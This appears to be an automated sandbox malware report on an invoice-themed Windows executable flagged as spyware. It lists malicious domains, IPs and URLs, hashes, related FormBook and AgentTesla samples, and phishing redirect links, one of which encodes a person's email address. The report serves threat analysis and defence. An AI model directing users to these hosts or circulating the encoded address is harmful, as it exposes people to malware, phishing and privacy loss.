                                                                                                                                                                                                              http://www.5711337.xyz/Friends/494a799498.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://www.5711337.xyz/template/news/mip05/css/fontawesome-all.min.csstaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  http://www.5711337.xyz/Friends/320a6299617.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    http://www.5711337.xyz/Love/669b6299268.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                      http://www.5711337.xyz/Dating/430a6299507.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        http://www.5711337.xyz/uploads/images/194750.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                          http://www.5711337.xyz/shuiximeili/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                            http://www.5711337.xyz/jizemingbuf/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                              http://www.5711337.xyz/Friends/350f099649.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                http://www.5711337.xyz/uploads/images/5074320.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                  http://www.5711337.xyz/gongdilan/oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		unknown

                                                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                    104.21.42.219
                                                                                                                                                                                                                                    		www.n-paylity.shopUnited States
                                                                                                                                                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                    154.23.184.95
                                                                                                                                                                                                                                    		wcr5.topUnited States
                                                                                                                                                                                                                                    		174COGENT-174UStrue
                                                                                                                                                                                                                                    206.119.82.147
                                                                                                                                                                                                                                    		93wxd.topUnited States
                                                                                                                                                                                                                                    		174COGENT-174UStrue
                                                                                                                                                                                                                                    172.67.218.106
                                                                                                                                                                                                                                    		www.syncsnode.netUnited States
                                                                                                                                                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                    74.48.31.123
                                                                                                                                                                                                                                    		www.facaicloud.topCanada
                                                                                                                                                                                                                                    		14663TELUS-3CAtrue
                                                                                                                                                                                                                                    103.249.106.91
                                                                                                                                                                                                                                    		www.5711337.xyzChina
                                                                                                                                                                                                                                    		137443ANCHGLOBAL-AS-APAnchnetAsiaLimitedHKtrue
                                                                                                                                                                                                                                    3.33.130.190
                                                                                                                                                                                                                                    		nibcorp.xyzUnited States
                                                                                                                                                                                                                                    		8987AMAZONEXPANSIONGBtrue
                                                                                                                                                                                                                                    85.159.66.93
                                                                                                                                                                                                                                    		natroredirect.natrocdn.comTurkey
                                                                                                                                                                                                                                    		34619CIZGITRtrue
                                                                                                                                                                                                                                    162.0.225.218
                                                                                                                                                                                                                                    		www.supox.siteCanada
                                                                                                                                                                                                                                    		22612NAMECHEAP-NETUStrue

                                                                                                                                                                                                                                    General Information

                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                    Analysis ID:1531665
                                                                                                                                                                                                                                    Start date and time:2024-10-11 15:07:31 +02:00
                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                    Overall analysis duration:0h 10m 21s
                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                    Run name:Run with higher sleep bypass
                                                                                                                                                                                                                                    Number of analysed new started processes analysed:9
                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                    Number of injected processes analysed:2
                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                    Sample name:COMMERCIAL INVOICES.exe
                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@10/9
                                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                                    • Successful, ratio: 75%
                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                    • Successful, ratio: 89%
                                                                                                                                                                                                                                    • Number of executed functions: 83
                                                                                                                                                                                                                                    • Number of non-executed functions: 286
                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                    • VT rate limit hit for: COMMERCIAL INVOICES.exe

                                                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                                    09:09:49API Interceptor5621117x Sleep call for process: taskkill.exe modified

                                                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                                                    IPs

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    104.21.42.219Shipment Document BL,INV and Packing List Attached.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                    • lab2e1.xyz//inc/741e7bb0442c85.php
                                                                                                                                                                                                                                    154.23.184.95COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • www.hm23s.top/jd21/?FPTX=E8EgvcVhhAQQFir9OK6E+Mqm7tqMiVehFrZTPh8pbZDzIj0aN6RyatkqXtPCo6PBps4o&BlO=O0DXpF3H2
                                                                                                                                                                                                                                    206.119.82.147z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • www.wdeb18.top/jo6v/
                                                                                                                                                                                                                                    List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                    • www.wdeb18.top/vacs/
                                                                                                                                                                                                                                    AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • www.wdeb18.top/66vh/
                                                                                                                                                                                                                                    ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • www.wdeb18.top/66vh/
                                                                                                                                                                                                                                    103.249.106.91Mac Purchase Order PO102935.xlsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • www.2886080.xyz/weeg/
                                                                                                                                                                                                                                    3.33.130.190TUj6dgsTTR.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • www.doggieradio.net/szy7/
                                                                                                                                                                                                                                    EKTEDIR.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • www.warriorsyndrome.net/yled/
                                                                                                                                                                                                                                    AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • www.levelsabovetravel.info/kbee/
                                                                                                                                                                                                                                    NjjLYnPSZr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • www.mybodyradar.net/qyz6/
                                                                                                                                                                                                                                    lByv6mqTCJ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • www.rjscorp.org/cei6/
                                                                                                                                                                                                                                    3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • www.huemanstudio.today/0g5h/
                                                                                                                                                                                                                                    EqszHzzNn5.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • www.digitalbloom.info/a3uf/
                                                                                                                                                                                                                                    foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • www.takeun.club/ow7w/
                                                                                                                                                                                                                                    Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • www.tukaari.shop/9po4/
                                                                                                                                                                                                                                    RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • www.huemanstudio.today/0g5h/

                                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    natroredirect.natrocdn.comlByv6mqTCJ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • 85.159.66.93
                                                                                                                                                                                                                                    alWUxZvrvU.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • 85.159.66.93
                                                                                                                                                                                                                                    ROQ_972923.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • 85.159.66.93
                                                                                                                                                                                                                                    b6N1GKfKdR.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • 85.159.66.93
                                                                                                                                                                                                                                    3qsTcL9MOT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • 85.159.66.93
                                                                                                                                                                                                                                    ImBm40hNZ2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                    • 85.159.66.93
                                                                                                                                                                                                                                    8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • 85.159.66.93
                                                                                                                                                                                                                                    BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • 85.159.66.93
                                                                                                                                                                                                                                    jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • 85.159.66.93
                                                                                                                                                                                                                                    Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                    • 85.159.66.93

                                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    COGENT-174USna.elfGet hashmaliciousChaosBrowse
                                                                                                                                                                                                                                    • 154.12.82.11
                                                                                                                                                                                                                                    na.elfGet hashmaliciousChaosBrowse
                                                                                                                                                                                                                                    • 154.12.82.11
                                                                                                                                                                                                                                    na.elfGet hashmaliciousChaosBrowse
                                                                                                                                                                                                                                    • 154.12.82.11
                                                                                                                                                                                                                                    na.elfGet hashmaliciousChaosBrowse
                                                                                                                                                                                                                                    • 154.12.82.11
                                                                                                                                                                                                                                    na.elfGet hashmaliciousChaosBrowse
                                                                                                                                                                                                                                    • 154.12.82.11
                                                                                                                                                                                                                                    na.elfGet hashmaliciousChaosBrowse
                                                                                                                                                                                                                                    • 154.12.82.11
                                                                                                                                                                                                                                    na.elfGet hashmaliciousChaosBrowse
                                                                                                                                                                                                                                    • 154.12.82.11
                                                                                                                                                                                                                                    na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 38.43.93.83
                                                                                                                                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 38.63.117.247
                                                                                                                                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 38.43.93.83
                                                                                                                                                                                                                                    COGENT-174USna.elfGet hashmaliciousChaosBrowse
                                                                                                                                                                                                                                    • 154.12.82.11
                                                                                                                                                                                                                                    na.elfGet hashmaliciousChaosBrowse
                                                                                                                                                                                                                                    • 154.12.82.11
                                                                                                                                                                                                                                    na.elfGet hashmaliciousChaosBrowse
                                                                                                                                                                                                                                    • 154.12.82.11
                                                                                                                                                                                                                                    na.elfGet hashmaliciousChaosBrowse
                                                                                                                                                                                                                                    • 154.12.82.11
                                                                                                                                                                                                                                    na.elfGet hashmaliciousChaosBrowse
                                                                                                                                                                                                                                    • 154.12.82.11
                                                                                                                                                                                                                                    na.elfGet hashmaliciousChaosBrowse
                                                                                                                                                                                                                                    • 154.12.82.11
                                                                                                                                                                                                                                    na.elfGet hashmaliciousChaosBrowse
                                                                                                                                                                                                                                    • 154.12.82.11
                                                                                                                                                                                                                                    na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 38.43.93.83
                                                                                                                                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 38.63.117.247
                                                                                                                                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 38.43.93.83
                                                                                                                                                                                                                                    CLOUDFLARENETUShttps://tzr7wtjq.r.us-east-1.awstrack.me/L0/https:%2F%2Fclickproxy.retailrocket.net%2F%3Furl=https%253A%252F%252Fneamunit.ro%2F%2Fwinners%2F%2Fnatalie.gilbert%2FbmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001927b41f2f4-541067bc-8926-4dcb-8f02-24fcf186dd1a-000000/pqvbHhvZKuWAqkc2J1BWoU1pciA=395Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    Quotation-GINC-19-00204.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                    New order PO#001498.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    PO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    https://tzr7wtjq.r.us-east-1.awstrack.me/L0/https:%2F%2Fclickproxy.retailrocket.net%2F%3Furl=https%253A%252F%252Fneamunit.ro%2F%2Fwinners%2F%2Fnatalie.gilbert%2FbmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001927b41f2f4-541067bc-8926-4dcb-8f02-24fcf186dd1a-000000/pqvbHhvZKuWAqkc2J1BWoU1pciA=395Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                    invoice.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                                                                                                                                                                                                                                    • 104.20.3.235
                                                                                                                                                                                                                                    https://stacksports.captainu.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 162.247.243.29
                                                                                                                                                                                                                                    https://na2.docusign.net/Signing/EmailStart.aspx?a=8ad02d97-8076-44e2-a042-fe16530c5407&etti=24&acct=c5a8c3f6-b465-4834-92a5-13d8938404ab&er=f0b416b1-58c5-41c9-b4fc-e691bed625b5Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 172.67.201.111
                                                                                                                                                                                                                                    http://host.cloudsonicwave.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    http://host.cloudsonicwave.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    CLOUDFLARENETUShttps://tzr7wtjq.r.us-east-1.awstrack.me/L0/https:%2F%2Fclickproxy.retailrocket.net%2F%3Furl=https%253A%252F%252Fneamunit.ro%2F%2Fwinners%2F%2Fnatalie.gilbert%2FbmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001927b41f2f4-541067bc-8926-4dcb-8f02-24fcf186dd1a-000000/pqvbHhvZKuWAqkc2J1BWoU1pciA=395Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    Quotation-GINC-19-00204.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                    New order PO#001498.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    PO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    https://tzr7wtjq.r.us-east-1.awstrack.me/L0/https:%2F%2Fclickproxy.retailrocket.net%2F%3Furl=https%253A%252F%252Fneamunit.ro%2F%2Fwinners%2F%2Fnatalie.gilbert%2FbmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001927b41f2f4-541067bc-8926-4dcb-8f02-24fcf186dd1a-000000/pqvbHhvZKuWAqkc2J1BWoU1pciA=395Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                    invoice.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                                                                                                                                                                                                                                    • 104.20.3.235
                                                                                                                                                                                                                                    https://stacksports.captainu.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 162.247.243.29
                                                                                                                                                                                                                                    https://na2.docusign.net/Signing/EmailStart.aspx?a=8ad02d97-8076-44e2-a042-fe16530c5407&etti=24&acct=c5a8c3f6-b465-4834-92a5-13d8938404ab&er=f0b416b1-58c5-41c9-b4fc-e691bed625b5Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    • 172.67.201.111
                                                                                                                                                                                                                                    http://host.cloudsonicwave.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                    http://host.cloudsonicwave.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 188.114.96.3

                                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\COMMERCIAL INVOICES.exe.log

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\COMMERCIAL INVOICES.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1216
                                                                                                                                                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\2636-l0

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                    Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Entropy (8bit):7.862679241254475
                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                    File name:COMMERCIAL INVOICES.exe
                                                                                                                                                                                                                                    File size:717'832 bytes
                                                                                                                                                                                                                                    MD5:57ccf777596297f30d94bc1394d4b38f
                                                                                                                                                                                                                                    SHA1:21fecf43b375e8171f96e13d3d88e83fa5f05cb7
                                                                                                                                                                                                                                    SHA256:29872a0c2ff44faae6e8b1cb4f561978c51a21a195bf545b22e76451521b92d3
                                                                                                                                                                                                                                    SHA512:93368d54f5e59987f49252472a7d8751b5acfbdd7019b50a971890872dd008f72349e3d3d56823a059e12ddf480221e83cc5bfccb14b17d499575ccfe8e5d5c0
                                                                                                                                                                                                                                    SSDEEP:12288:YP12gXnflefVU5T0vJ8PvkcbNHCxu0CYwWMVMkH/0Z9r5b5WqpAgPkR:Y7flhT0iEAHzhPH/0by0AgK
                                                                                                                                                                                                                                    TLSH:B9E412A19A2AEC61C6A503F00531E77627F52FE9E412E3638EFDECDB75463A130A4351
                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S..g..............0.............B.... ........@.. ....................... ............`................................

                                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                                    Icon Hash:01242c66198d8d9e

                                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Entrypoint:0x4ac542
                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                    Time Stamp:0x6707A653 [Thu Oct 10 10:02:59 2024 UTC]
                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                    Authenticode Signature

                                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                                    • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                                                                                                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                                                                                                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                                                                                                                                    Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                                    Instruction
